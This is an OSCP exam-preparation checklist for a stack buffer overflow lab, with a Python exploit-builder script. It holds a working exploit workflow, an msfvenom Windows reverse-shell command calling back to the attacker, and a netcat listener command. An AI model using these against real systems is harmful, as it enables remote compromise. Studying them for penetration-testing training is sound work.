Buffer Overflow preparation for OSCP
- Run fuzzer.py & make a note of the number of bytes in the request that crashed the server (the last length printed before the socket error)
- e.g. crashed at 2000 bytes
Generate a cyclic pattern 400 bytes longer than the string that crashed the server (2000 + 400), so the whole overflow, including EIP, is covered by unique bytes
- ./pattern_create.rb -l 2400 (on Kali the script lives in /usr/share/metasploit-framework/tools/exploit/)
Copy the output and place it into the payload var of exploit.py
Restart the app in Immunity Debugger & Run exploit.py
While the unique pattern is still on the stack (i.e. right after the crash, before restarting the app), use mona's findmsp command with the distance arg. set to the pattern length (2400). The "EIP contains normal pattern : ... (offset NNNN)" line is the value you need
- !mona config -set workingfolder c:\mona\%p
- !mona findmsp -distance 2400
Set the offset var in exploit.py to the EIP offset findmsp reported (1978 in this example)
Set the payload var to an empty string
Set the retn var to "BBBB"
Restart the app in Immunity & Run exploit.py (EIP should be overwritten with four B's, i.e. 42424242; if it is not, the offset is wrong and the findmsp step needs repeating)
Generate a bytearray with mona, excluding the null byte \x00 up front (it terminates C strings, so it is a badchar for almost every target), and note the location of bytearray.bin
- !mona bytearray -b "\x00"
Generate an identical bytearray with bytearray.py (same exclusions, same order, otherwise the compare step will not line up)
Update exploit.py and set the payload var to the string of badchars the script generates
Restart the app in Immunity & Run exploit.py, make note of the address ESP points to (the bytearray starts there) and compare it against the file mona wrote
- !mona compare -f C:\mona\oscp\bytearray.bin -a <address in ESP>
Generate a new bytearray with mona, excluding \x00 plus the badchars compare reported, & remove the same bytes from the payload var in exploit.py. Badchars tend to show up in consecutive pairs (\x07\x08, \x2e\x2f, \xa0\xa1) because the byte following a real badchar is usually flagged as modified too; when in doubt, exclude only the first byte of each pair and check whether the second one still shows as modified on the next run
- !mona bytearray -b "\x00\x07\x08\x2e\x2f\xa0\xa1"
Restart app & Run exploit
Repeat this until the compare results status returns "Unmodified". This indicates that no more badchars exist.
Run the following mona command with all the identified badchars (including \x00) to list JMP ESP instructions whose addresses contain none of them
- !mona jmp -r esp -cpb "\x00\x07\x08\x2e\x2f\xa0\xa1"
Choose an address (prefer one from a module that mona lists with ASLR, Rebase and SafeSEH all False) and update exploit.py, setting the retn var to the address written backwards (little endian)
- address 625011af (bytes \x62\x50\x11\xaf) -> retn = "\xaf\x11\x50\x62"
- msfvenom (LHOST = the attacker's VPN address or interface, -b with all the identified badchars so the encoder avoids them)
- msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x08\x2e\x2f\xa0\xa1" -f c
- Update the payload var in exploit.py with the generated shellcode
- padding = "\x90" * 16 (a NOP slide between the JMP ESP and the shellcode, so the encoder's decoder stub has stack space to unpack without overwriting itself)
- Start a netcat listener on the attacker machine before sending (nc -nlvp 4444)
- Restart app in Immunity & Run exploit.py; the reverse shell should connect back to the listener
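The checklist above builds exploit.py up one variable at a time. The script below is an added worked example, not the page's or TryHackMe's exploit.py: it lays out the buffer the same way (prefix + overflow + retn + padding + payload + postfix), generates the bytearray string the way bytearray.py does, packs the return address little-endian, and adds two offline checks a practitioner wants: a stand-in for what `!mona compare` flags (to see the pair effect) and a check that the msfvenom output really contains none of the badchars. IP, PORT, PREFIX and SHELLCODE are assumptions/placeholders; OFFSET, BADCHARS and JMP_ESP are the page's example values and must be replaced with what findmsp, compare and jmp report on the real target.

```python
#!/usr/bin/env python3
import socket
import struct

# Assumed placeholders (replace with the real target and the fuzzer's prefix).
IP = "10.10.10.10"
PORT = 1337
PREFIX = b"OVERFLOW1 "
# Page's example values (replace with what mona reports for your target).
OFFSET = 1978
BADCHARS = b"\x00\x07\x08\x2e\x2f\xa0\xa1"
JMP_ESP = 0x625011af


def bytearray_string(exclude=b"\x00"):
    """What bytearray.py produces: every byte 0x00-0xff, in order, minus the
    excluded ones. Must use the same exclusions as `!mona bytearray -b "..."`
    or `!mona compare` will not line up."""
    return bytes(b for b in range(256) if b not in exclude)


def little_endian(addr):
    """Write a 32-bit address backwards: 0x625011af -> b'\\xaf\\x11\\x50\\x62'."""
    return struct.pack("<I", addr)


def flagged_bytes(sent, seen):
    """Offline stand-in for what `!mona compare` flags: the byte values whose
    copy on the stack differs from (or is missing compared to) what was sent.
    A real badchar usually drags the byte after it into the flagged list too,
    so pairs like \\x07\\x08 deserve a second run excluding only \\x07."""
    flagged = []
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            flagged.append(b)
    return flagged


def bad_bytes_in(payload, badchars=BADCHARS):
    """Check the msfvenom output: any badchar that survived -b encoding would
    be mangled on the stack and the shellcode would never run."""
    return sorted({b for b in payload if b in badchars})


def build_buffer(offset=OFFSET, retn=b"BBBB", padding=b"", payload=b"",
                 prefix=PREFIX, postfix=b""):
    """Same layout as exploit.py. Verifies that the four bytes at the EIP
    offset are exactly retn before returning the buffer."""
    overflow = b"A" * offset
    buf = prefix + overflow + retn + padding + payload + postfix
    eip = buf[len(prefix) + offset:len(prefix) + offset + 4]
    if eip != retn:
        raise ValueError("retn does not land on EIP, check offset")
    return buf


def send_buffer(buf, ip=IP, port=PORT, timeout=5):
    """Deliver the buffer to the target service and return the byte count."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        print(f"Sending {len(buf)} bytes to {ip}:{port}")
        s.send(buf + b"\r\n")
    return len(buf)


if __name__ == "__main__":
    # Stage 1: confirm EIP control (expect EIP = 42424242 in Immunity).
    stage_eip = build_buffer(retn=b"BBBB")

    # Stage 2: badchar hunt, payload is the bytearray minus \x00.
    stage_badchars = build_buffer(payload=bytearray_string(b"\x00"))

    # Stage 3: final exploit. SHELLCODE is a constructed placeholder; paste the
    # msfvenom -b "<badchars>" -f c output here instead.
    SHELLCODE = b"\xcc" * 8
    if bad_bytes_in(SHELLCODE):
        raise SystemExit("shellcode still contains badchars, re-run msfvenom")
    final = build_buffer(retn=little_endian(JMP_ESP),
                         padding=b"\x90" * 16, payload=SHELLCODE)
    send_buffer(final)
```

Run one stage at a time by editing the `__main__` block, exactly as the checklist edits exploit.py; `flagged_bytes` is only for reasoning about the compare output offline (feed it the bytes sent and a dump of what landed at ESP) and is not a replacement for running `!mona compare` in the debugger.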